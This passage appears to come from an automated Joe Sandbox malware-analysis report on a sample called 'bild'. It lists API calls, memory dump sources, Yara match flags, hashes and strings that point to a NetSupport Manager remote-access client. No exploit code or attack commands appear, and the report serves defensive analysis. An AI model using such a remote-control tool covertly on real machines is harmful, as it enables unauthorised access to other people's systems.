                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __waccess_s
                                                                                  • String ID:
                                                                                  • API String ID: 4272103461-0
                                                                                  • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                  • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3646066109-0
                                                                                  • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                  • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                  APIs
                                                                                  • _NSMClient32@8.PCICL32(?,?,?,002610A2,00000000), ref: 0026100B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3888305638.0000000000261000.00000020.00000001.01000000.00000009.sdmp, Offset: 00260000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3888290603.0000000000260000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_260000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Client32@8
                                                                                  • String ID:
                                                                                  • API String ID: 433899448-0
                                                                                  • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction ID: 1c427522f25c885655c014e9921e41579c9602ecca8cab84f8c454eca6c03ecb
                                                                                  • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction Fuzzy Hash: 28B092B212434D9B8B14EE98E841C7B339CAB98600B040809BD0543282CA61FCB09A71
                                                                                  APIs
                                                                                    • Part of subcall function 6D0309A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D031E32,00000001,?,00000000,00000000,00000000,?,6D0575BC,00000001,00000214), ref: 6D0309E8
                                                                                  • Sleep.KERNEL32(00000000), ref: 6D05F1D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3890464582.000000006D021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6D020000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3890446633.000000006D020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890532245.000000006D0D4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890550927.000000006D0D6000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890580013.000000006D0D9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6d020000_bild.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeapSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4201116106-0
                                                                                  • Opcode ID: 9327228329cdd046378321e5164dfaea14eb01df6a4b39b9f1dcd669e2830b39
                                                                                  • Instruction ID: 70a72b022c88d7e00a11405c27ee2ecc425ddf3193f15657cb2830076e67d6d2
                                                                                  • Opcode Fuzzy Hash: 9327228329cdd046378321e5164dfaea14eb01df6a4b39b9f1dcd669e2830b39
                                                                                  • Instruction Fuzzy Hash: 7FF0A7355401265BDB114666D804B9A3AEAABC6370B220722E938C3184DB328501C393
                                                                                  APIs
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • wsprintfA.USER32 ref: 110EB1B8
                                                                                  • GetTickCount.KERNEL32 ref: 110EB212
                                                                                  • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                  • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                  • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                  • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                  • API String ID: 3451743168-2289091950
                                                                                  • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                  • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                  • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                  • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                  APIs
                                                                                    • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                    • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                    • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                  • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                  • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                  • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                  • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                  • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                  • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                  • String ID: AddToJournal$Chat
                                                                                  • API String ID: 693070851-2976406578
                                                                                  • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                  • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                  • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                  • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                  APIs
                                                                                  • SetForegroundWindow.USER32(?), ref: 1115F12E
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  • SystemParametersInfoA.USER32(00002000,00000000,00000000,00000000), ref: 1115F14F
                                                                                  • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                  • SetForegroundWindow.USER32(?), ref: 1115F162
                                                                                  • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F177
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                  • API String ID: 3960414890-2201682149
                                                                                  • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                  • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                  • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                  • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                  APIs
                                                                                  • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                  • _strncat.LIBCMT ref: 1102518B
                                                                                  • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                  • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                  • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                  • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                  • SetFocus.USER32(?), ref: 11025265
                                                                                    • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3832070631-0
                                                                                  • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                  • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                  • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                  • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                  APIs
                                                                                  • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                  • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 180989782-0
                                                                                  • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                  • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                  • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                  • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                  • _strrchr.LIBCMT ref: 1114315A
                                                                                  • _strrchr.LIBCMT ref: 1114316A
                                                                                  • wsprintfA.USER32 ref: 11143185
                                                                                    • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                  • String ID: BILD
                                                                                  • API String ID: 2529650285-1114602597
                                                                                  • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                  • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                  • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                  • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  Strings
                                                                                  • m_hWnd, xrefs: 11001126
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1604732272-2830328467
                                                                                  • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                  • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                  • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                  • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4